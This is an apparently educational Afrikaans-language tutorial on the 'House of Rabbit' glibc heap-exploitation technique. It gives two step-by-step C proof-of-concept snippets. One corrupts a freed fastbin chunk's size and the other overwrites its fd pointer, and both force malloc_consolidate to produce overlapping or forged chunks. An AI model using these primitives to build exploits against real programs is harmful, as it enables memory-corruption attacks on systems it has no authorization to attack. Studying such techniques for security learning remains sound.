House of Rabbit

Vereistes

1. Vermogen om die fast bin fd pointer of grootte te verander: Dit beteken jy kan die voorwaartse pointer van 'n chunk in die fastbin of sy grootte verander.

2. Vermogen om malloc_consolidate te aktiveer: Dit kan gedoen word deur 'n groot chunk toe te ken of die boonste chunk te meng, wat die heap dwing om chunks te konsolideer.

Doelwitte

1. Skep oorvleuelende chunks: Om een chunk te laat oorvleuel met 'n ander, wat verdere heap manipulasies moontlik maak.

2. Vervalsing van valse chunks: Om die toewysingsprogram te mislei om 'n valse chunk as 'n legitieme chunk te behandel tydens heap operasies.

Stappe van die aanval

POC 1: Verander die grootte van 'n fast bin chunk

Doelwit: Skep 'n oorvleuelende chunk deur die grootte van 'n fastbin chunk te manipuleer.

• Stap 1: Ken Chunks toe

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x40);  // Allocates another chunk of 0x40 bytes at 0x602050
malloc(0x10);                          // Allocates a small chunk to change the fastbin state

Ons allokeer twee stukke van 0x40 bytes elk. Hierdie stukke sal in die vinnige bin lys geplaas word sodra hulle vrygestel word.

• Stap 2: Vrygestelde Stukke

free(chunk1);  // Frees the chunk at 0x602000
free(chunk2);  // Frees the chunk at 0x602050

We maak albei stukke vry en voeg hulle by die fastbin lys.

• Stap 3: Wysig Stukgrootte

chunk1[-1] = 0xa1;  // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1])

We verander die grootte metadata van chunk1 na 0xa1. Dit is 'n belangrike stap om die allokator te mislei tydens konsolidasie.

• Stap 4: Trigger malloc_consolidate

malloc(0x1000);  // Allocate a large chunk to trigger heap consolidation

Allocasie van 'n groot stuk aktiveer die malloc_consolidate funksie, wat klein stukke in die vinnige bin saamvoeg. Die gemanipuleerde grootte van chunk1 veroorsaak dat dit oorvleuel met chunk2.

Na konsolidasie oorvleuel chunk1 met chunk2, wat verdere uitbuiting moontlik maak.

POC 2: Wysig die fd wysiger

Doel: Skep 'n valse stuk deur die vinnige bin fd wysiger te manipuleer.

• Stap 1: Allokeer Stukke

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050

Verklaring: Ons allokeer twee stukke, een kleiner en een groter, om die heap op te stel vir die valse stuk.

• Stap 2: Skep valse stuk

chunk2[1] = 0x31;  // Fake chunk size 0x30
chunk2[7] = 0x21;  // Next fake chunk
chunk2[11] = 0x21; // Next-next fake chunk

We skryf vals chunk metadata in chunk2 om kleiner chunks te simuleer.

• Stap 3: Vry chunk1

free(chunk1);  // Frees the chunk at 0x602000

Verklaring: Ons vry chunk1, wat dit by die fastbin lys voeg.

• Stap 4: Wysig fd van chunk1

chunk1[0] = 0x602060;  // Modify the fd of chunk1 to point to the fake chunk within chunk2

Verklaring: Ons verander die voorwaartse wysser (fd) van chunk1 om na ons valse chunk binne chunk2 te wys.

• Stap 5: Trigger malloc_consolidate

malloc(5000);  // Allocate a large chunk to trigger heap consolidation

Allocating a large chunk again triggers malloc_consolidate, which processes the fake chunk.

The fake chunk becomes part of the fastbin list, making it a legitimate chunk for further exploitation.

Summary

Die House of Rabbit tegniek behels of die grootte van 'n fast bin chunk te verander om oorvleuelende chunks te skep of die fd pointer te manipuleer om valse chunks te skep. Dit stel aanvallers in staat om legitieme chunks in die heap te forgeer, wat verskeie vorme van eksploitatie moontlik maak. Om hierdie stappe te verstaan en te oefen, sal jou heap eksploitatievaardighede verbeter.